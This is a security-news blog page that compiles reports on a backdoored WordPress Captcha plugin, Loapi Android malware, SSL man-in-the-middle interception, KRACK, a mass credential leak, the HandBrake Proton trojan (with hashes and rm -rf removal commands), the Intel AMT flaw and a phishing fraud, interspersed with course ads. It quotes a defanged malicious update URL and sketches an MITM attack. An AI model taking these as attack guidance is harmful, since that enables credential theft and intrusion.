WordPress captcha plugin having a hidden backdoor affects over 300,000 websites

WordPress captcha plugin having a hidden backdoor affects over 300,000 websites. Obtaining prevalent plugins with an enormous user-base and using it for effortless malicious campaigns have become a new trend for bad players.

Wordpress Captcha pluginRecently a renowned developer BestWebSoft sold a popular WordPress Captcha plugin to an anonymous buyer, who then amended the plugin to download and install a hidden backdoor.

In a recent blog post, WordFence security firm shown why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin store.

While reviewing the source code of the Captcha plugin, WordFence folks found a severe backdoor that could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.

The plugin was configured to automatically pull an updated “backdoored” version from a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation from the official WordPress repository without site admin consent.

In WordPress captcha plugin this backdoor code was designed to create a login session for the attacker, who is the plugin author in this case, with administrative privileges, allowing them to gain access to any of the 300,000 websites (using this plugin) remotely without requiring any authentication?

“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself’” reads the WordFence blog post. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”

Also, the modified code pulled from the remote server is almost identical to the code in legitimate plugin repository, therefore “triggering the same automatic update process removes all file system traces of the backdoor,” making it look as if it was never there and helping the attacker avoid detection.

The reason behind the adding a backdoor is unclear at this moment, but if someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind.

In similar cases, we have seen how organized cyber gangs acquire popular plugins and applications to stealthy infect their large user base with malware, adware, and spyware.

While figuring out the actual identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named “Stacy Wellington” using the email address “scwellington[at]hotmail.co.uk.”

Using reverse whois lookup, the researchers found a large number of other domains registered to the same user, including Convert me Popup, Death to Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

 RHCE  training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Digital marketing

CCNA training

A new android malware can be a possible threat to your phone.

A new Android malware has been discovered by a group of researchers, which can possibly physically damage your phone.

A new android malware

Your phone is physically under threat due to this new Android Malware.

Hackers, as well as legitimate website administrators, are progressively using Javascript based cryptocurrency miners to monetize by levying the CPU power of your PC to mine Bitcoin or other cryptocurrencies, due to the latest surge in cryptocurrency prices.

Just last week, Researchers from AdGuard revealed that some prevalent video streaming and ripper sites including openload, Streamango, Rapidvideo, and OnlineVideoConverter hijacks CPU cycles from their over hundreds of millions of visitors for mining Monero cryptocurrency.

Now, researchers from Moscow-based cyber security firm Kaspersky Lab have disclosed a new Android malware lurking in fake anti-virus and porn applications, which is capable of executing an overabundance of disreputable activities—from excavating cryptocurrencies to hurling Distributed Denial of Service (DDoS) bouts.

Described as a “jack-of-all-trades” by the researchers, Loapi has a modular architecture that lets it conduct a variety of malicious activities, including mining the Monero cryptocurrency, launching DDoS attacks, bombarding infected users with constant ads, redirecting web traffic, sending text messages, and downloading and installing other apps.

Loapi Destroyed An Android Phone In Just 2 Days 

hack-android-malware

When analyzed A new Android malware, dubbed Loapi, the new Android Trojan can perform so many more malicious activities at a time that can exploit a handset to the extent that within just two days of infection it can cause the phone’s battery to bulge out of its cover.

According to researchers, the Hackers behind Loapi are the same account for the 2015 Android malware Podec. They are dispensing the malware through third-party app stores and online advertisements that pose as apps for “popular antivirus solutions and even a famous porn site.”

A screenshot in the Kaspersky blog suggests that Loapi impersonates as at least 20 variations of adult-content apps and legitimate antivirus software from AVG, Psafe DFNDR, Kaspersky Lab, Norton, Avira, Dr. Web and CM Security, among others.

Upon installation, Loapi forces the user to grant it ‘device administrator’ permissions by looping a pop-up until a victim clicks yes, which gives the malicious app the same power over your smartphone that you have.

This highest level privilege on a device would also make the Loapi malware ideal for user espionage, though this capability is not yet present in the malware, the Kaspersky researchers think this can be included in the future.

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

 RHCE  training

CEH V9  training

Diploma in Network Security Training

Secure Coding in Java

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advanced Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Digital marketing

CCNA training

SSL Certificate

SSL Certificate

SSL Certificate authenticity is being doubted because of the increase in the online hacking of your personal data even from the websites having SSL certificate. Wondering how it’s done? Here we have explained it in a very simplified manner.

SSL Certificate

Did you know how the online passwords are hacked? Well, read on to learn.

In order to understand how the hacking of online passwords work, we need to first understand how safe SSL certificate is really? These days Fund transfers and online shopping are done using predominantly internet banking and credit cards. And people believe that once a website acquires SSL certificate it is entirely safe, but the fact is that it’s always better to secure your computer and internet connection instead of entirely depending on the payment sites because it’s actually quite easy to break the SSL. For this we also should understand how credit cards work and how transactions are performed.

An understanding of how we can exploit the vulnerability in credit or debit card functionality to hack their passwords is also much required, usually credit cards are hacked using packet sniffing and session hijacking. It is virtually impossible to see the actual data that is transferred during a transaction, but by using session hijacking and packet sniffing we can achieve to see the data in an encrypted form.

What really is attacked?

A lethal flaw that allows sensitive information to be stolen occurs when an end-user is not properly educated on the easily executable, well-known SSL exploit: SSL MITM. Hackers take advantage of that to get access to your sensitive data. The only thing required to block the ambiguities in the system is a rightly educated end user to make sure that your system is 100% hacker proof.

How the hack works and how to do it:

Before we get started on this topic it is very important to note that hacking credit & debit card details is unlawful which results in serious consequences including imprisonment. This information is entirely just to make you aware of how it works.

The following diagram demonstrates a very streamlined graphic of how your SSL website session works during an attack:

MITM-attack-diagram

 

A certificate is used to establish the secure SSL connection. It is advisable if you have the right certificate and are connecting directly to the website you intended to use. Then all your data is encrypted from your browser to the SSL website where the bank’s website will use the information from the certificate it gave you to decrypt your data/credentials. If that is truly the case, then it is pretty darn hard for a hacker to decrypt the data/credentials being transmitted, even if he is able to sniff your data.

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

 RHCE  training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Digital marketing

CCNA training

Security Flaw in WPA2

 

Security Flaw in WPA2

Security flaw in WPA2, the security protocol for most modern WiFi systems could make it easily possible for the attackers to steal all sorts of sensitive data such as credit card numbers, passwords, emails etc – said by Researchers at Belgian university KU Leuven.

Security flaw in WPA2

Wifi systems could be vastly affected by the WPA2 flaw.

In fact the security flaw also could permit an attacker to vaccinate or influence information in the system, depending on the network configuration – for example, inoculate ransomware or other malware into websites being used only because of the security flaw.

wifi-wpa2

Widespread Impact

According to the researchers, a sequence of susceptibilities was found in Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys and other systems. Users will have to update affected products the moment patches become available, to fix the issue.

The research has been presented at the ACM Conference on Computer and Communication Security, which took place from October 30 to November 3 in Dallas, and will have its presence at the Black Hat Europe conference in December.

According to the company, it was wise to withdraw from disclosing the flaw in order to sanction other vendors some more time to develop and release updates.

As a proof of concept, the DistriNet researchers implemented a significant reinstallation attack (KRACK) against an Android smartphone, stating that Linux and Android 6.0 or higher were predominantly susceptible. Both operating systems can be conned into reinstalling an all-zero encryption key.

The focal attack is against the four-way handshake of the WPA2 protocol, according to the researchers. The handshake takes place when a user wishes to join a secure WiFi network and the protocol is used to approve that the client and access point have the accurate credentials.

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

 RHCE  training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Digital marketing

CCNA training

Breach of personal data

Breach of personal data

Breach of personal data by online hackers has jeopardized the online user’s life in a great way. It’s usually the weakest link that hackers go for at first to gain access to your online accounts.

Breach of personal data

Over 1.4 Billion plain texts leaked passwords dispersed online

Reusing the same password across multiple channels gives hackers opportunity to break into the online user’s other online accounts by using the credentials gathered via breach of personal data.

Researchers from security firm 4iQ have now discovered a fresh group of the database on the dark web (released on Torrent as well) that comprises of a massive 1.4 billion usernames and passwords in clear text.

We downloaded a copy to verify its authenticity a few days ago, from a post on Reddit that gained more publicity. Even though the links to download the collection were already circulating online over dark-web sites from last few weeks.

The 41GB gigantic collection, as shown below, comprehends 1.4 billion usernames, email, and password arrangements—well fragmented and organized into two and three level handbooks said by researchers.

The combined databank covers plain text credentials leaked from Pastebin, Bitcoin, MySpace, LinkedIn, YouPorn, Netflix, Zoosk, Last.FM, RedBox, Badoo, games like Runescape and Minecraft, as wells as credential lists like Exploit.in, Anti Public.

Password selecting policies

 

Password selecting policies are important to follow while selecting passwords for your various online websites. The only rule to follow password selecting policies is to mix and match and create a unique & precise password that you can remember.

The databank has been tidily structured and indexed alphabetically so that hackers with basic knowledge can quickly search for passwords.

While some of the breach cases are somewhat old with stolen credentials circulating online for some time, the accomplishment ratio is still high for lawbreakers, due to user’s mean habit of re-using their passwords through diverse platforms and selecting easy-to-use passwords.

It is still uncertain who is accountable for uploading the databank on the dark web, but whoever it is has incorporated Dogecoin and Bitcoin wallets for any user who wishes to contribute.

In order to safeguard yourself, it is highly advised to stop using the same passwords across multiple websites and also to retain complex and strong passwords. We also follow the password selecting policies to create hack-proof passwords.

For example, you can easily use the “LEET” language to select your unique password like, convert “Sneha likes swimming” into “$N3#@|!K3$$WMM!N&” this is shown just for example. You can create various short passwords using the same method or can also find resources online to help you encode the password you have chosen.

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

 RHCE  training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Digital marketing

CCNA training

Mac App developers Issued Urgent Malware Warning

Mac App developers Issued Urgent Malware Warning

Mac App developers Issued Urgent Malware Warning. Mac security has been going through some difficult times after the warning from Checkpoint to users regarding a first of a kind Trojan spreading in Europe. The latest malicious problem has been found in one of the most important video transcoding apps for Mac.

The developers of the software Handbrake issued a warning, mentioning that one of the mirror sites to download the software has been compromised. The warning is only for those users who may have downloaded the software between 2nd to 6th May with a maximum chance of being infected.

Mac App developers Issued Urgent Malware WarningOn the mirror server, the installer file download.handbrake.fr (HandBrake-1.0.7.dmg) was replaced by a malicious file, which gives the hacker root access privileges to the system. The malware is a form of OSX.PROTON. In February, Apple had issued an update to XProtect to account for the original Proton. The latest version should automatically download for more users.

Following the process of detection and removal of the malicious malware:

Detection:-

Your device is infected if you see a process called “Activity_agent” in the OSX Activity Monitor application. For instance, if you’ve installed a HandBrake.dmg with the following checksums, you will also be infected:

SHA1: 0935a43ca90c6c419a49e4f8f1d75e68cd70b274

SHA256: 013623e5e50449bbdf6943549d8224a122aa6c42bd3300a1bd2b743b01ae6793

The Trojan in question is a new variant of OSX.PROTON

Removal:-

Open up the “Terminal” application and run the following commands:

launchctl      unload          ~/Library/LaunchAgents/fr.handbrake.activity_agent.plistrm     -rf ~/Library/RenderFiles/activity_agent.appif ~/Library/VideoFrameworks/ contains proton.zip, remove the folder

Then Remove any “HandBrake.app” installs you may have.

Users of Handbrake should be more careful, although primary mirror site and the automatic updater on versions 1.0 or later haven’t been affected. For a safety measure, it is suggested that users should change all passwords stored in any OSX or browser keychains.

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Certified Network Penetration Tester 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Employee paid $300,000 for hacking employer

Employee paid $300,000 for hacking employer

Employee paid $300,000 for hacking employer. Security Specialists, a former private security officer has been told to pay nearly $319,000 in damages for hacking his employer’s payroll records, so that he can fill the number of hours he had worked hard.

The main culprit , Yovan Garcia later hacked the data from the firm’s server and spoiled its website also.

Michael Fitzgerald, the District Judge of California said that the culprit had taken advantages to challengers business by using the stolen the data from the firm’s server.

The company first noticed the flaw with Garcia’s pay records which was in July 2014, after two years he joined the company. In one , they showed he had worked 12 hours per day over a two-week period and was owed 40 hours of overtime pay, when in fact he only worked eight hours per day.

Employee paid $300,000 for hacking employerAccording to the Judge of the Central District Court, without authorisation he had obtained login credentials and accessed the records.

Judge Fitzgerald said: “As a result, defendant Garcia was paid thousands of dollars more in overtime wages than he was really owed.”

He ordered him to pay $318,661.70 to cover the costs as lost income and lost data to Security Specialists.

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Certified Network Penetration Tester 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Intel fixed nine year’s old flaw

Intel fixed nine years old flaw

Intel fixed nine years old flaw. Yes, after nine years a flaw was detected and patched by Intel. Intel, one of the world’s largest semiconductor chip makers, has come under fire it’s emerged that the company had sold workstation and server chips with a vulnerability that could give a remote attacker absolute control over the machine.

The bug has affected Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology firmware versions 6.x to 11.6. If exploited, it could give an attacker near-unfettered access to the targeted machine.

Intel fixed nine years old flawAMT is a tool that allows an authorized user to remotely manage a machine, giving serial access, with the right drivers. It can offer a remotely experienced desktop. In most cases, AMT requires the user authentication with a password but this vulnerability essentially find a way around that process, giving the keys to the kingdom to anyone with a copy of Metasploit.

If the computer is configured incorrectly network, where network port 16992 is accessible to the outside world, it means that anyone can take advantage of these features at any time sitting anywhere in the world. Even, someone could easily attack it from within the network.

The most troubling part of this matter is the bug – which luckily, is not found in consumer Intel chips – remained undetected for almost nine years. Intel has been selling vulnerable silicon for almost a decade. There must be, quite literally, hundreds of millions of computers at risk.

However for almost nine years, this bug remained undetected and for almost a decade the company has been selling vulnerable chips in the market. So, no one has any idea that how many computers are at risk, there must be hundreds of millions of devices.

Charlie Demerjian, wrote on blog SemiAccurate said, “the short version is that every Intel platform with AMT, ISM, and SBT from Nehalem in 2008 to Kaby Lake in 2017 has a remotely exploitable security hole”. He added, “even if your machine doesn’t have SMT, ISM, or SBT provisioned, it is still vulnerable, just not over the network

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Certified Network Penetration Tester 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

App Flaw Reportedly Creates Backdoor Hacking Millions Android Phones

App Flaw Reportedly Creates Backdoor Hacking Millions Android Phones

It has been revealed through a recent study of an internet communication mechanism common in mobile devices that so-called ‘open ports’ are much more vulnerable to security breaches than expected. App Flaw Reportedly Creates Backdoor Hacking Millions Android Phones.

Open ports are integral pieces of internet infrastructure allows computer programs to accept packets of information from remote servers. These communication mechanisms are routinely used in traditional computers, where they are secure because computers’ Internet Protocol addresses don’t change. An IP address identifies a connected device.

App Flaw Reportedly Creates Backdoor Hacking Millions Android Phones

Hundreds of Android apps on Google Play that help users connect to PCs via Wi-Fi leave some ports open and poorly secured, exposing the device to hackers who can steal private information such as contacts, security credentials and photos, they can remotely control a device, perform a denial of service attack, or inject malicious code that could jumpstart widespread, virus-like attacks”, the researchers say.

All this research was done by a group of researchers from the University of Michigan, who scanned almost 100,000 popular apps on Google Play. Out of which 1,632 apps created open ports mostly to connect to PCs. Out of these 1,632 apps, 410 apps had very weak to no security protection, and 57 apps specifically left ports completely open for hackers to tinker with. They claimed that the most vulnerable among the lot, is an app called Wifi File Transfer, that has as many as 10 million Android downloads and lets user share data across devices and connect to their phones from their computers and has no password or fingerprint authentication to protect the user’s data.

The researchers have advised Android users to update AirDroid to the latest patched version and not to use default pass codes. Vulnerable open port apps should only be launched when needed and after using them, users should be sure to exit them fully through the task manager.

Android users need to remain extra careful when using apps whose functionality is data sharing across devices, proxy/VPN, or enabling the user to control a phone remotely without physically accessing it. Consider using only those created by developers with good reputations,” said Yunhan Jia, a doctoral student in computer science and engineering who is involved in the research.

The developers instantly fixed the bug as soon as the Michigan researchers notified them. However, Wifi File Transfer app makers have failed to acknowledge till date.

The full research paper details half a dozen more apps including PhonePal and Virtual USB that create a backdoor for hackers to exploit.

The researchers say that “the user and Google for that matter is quite helpless in this matter, and developers’ will have to do a lot of work on their end to make their services more safe. For now, its best for users to uninstall all mentioned apps.”

 

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Certified Network Penetration Tester 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Google Facebook $100 million email scam found

Google Facebook $100 million email scam found

The tech companies Google and Facebook have confirmed that they fell victim to a $100 million email scam. It was reported that a Lithuanian man had been charged over an email phishing attack against “two US-based internet companies.” Google Facebook $100 million email scam found

Evaldas Rimasauskas, a 48 years man, was accused of being behind the scam. From 2013 to 2015, he defraud the companies into transfering payments to an account managed by him.

Google Facebook email scam foundWhen he was arrested Google and Facebook were not named as the victims, but 27 April, according to Fortune, an investigation company has confirmed the victims’ are none other than Google and Facebook.

The US Department of Justice said, “fraudulent phishing emails were sent to employees and agents of the victim companies, which regularly conducted multi-million dollar transactions with (the Asian) company.

The cybercriminal has since been charged with one count of money wire fraud, three counts of money laundering and one count of aggravated identity theft by the US Department of Justice. He is also accused of forging invoices, contracts, and letters.

Back in March, acting attorney Joon Kim said “From half a world away, Evaldas Rimasauskas allegedly targeted multinational internet companies and tricked their agents and employees into wiring over $100 million to overseas bank accounts under his control.”

A spokesperson for Google said, “We detected this fraud against our vendor management team and promptly alerted the authorities. We recouped the funds and we’re pleased this matter is resolved.

A spokeswoman for Facebook said: “Facebook recovered the bulk of the funds shortly after the incident and has been cooperating with law enforcement in its investigation.”

While Facebook and Google have not confirmed and mentioned the amount of money they have lost due to this miserable attack.

 

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Certified Network Penetration Tester 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

 

×

Hello!

Click one of our representatives below to chat on WhatsApp or send us an email to [email protected]

× Hi How can we help you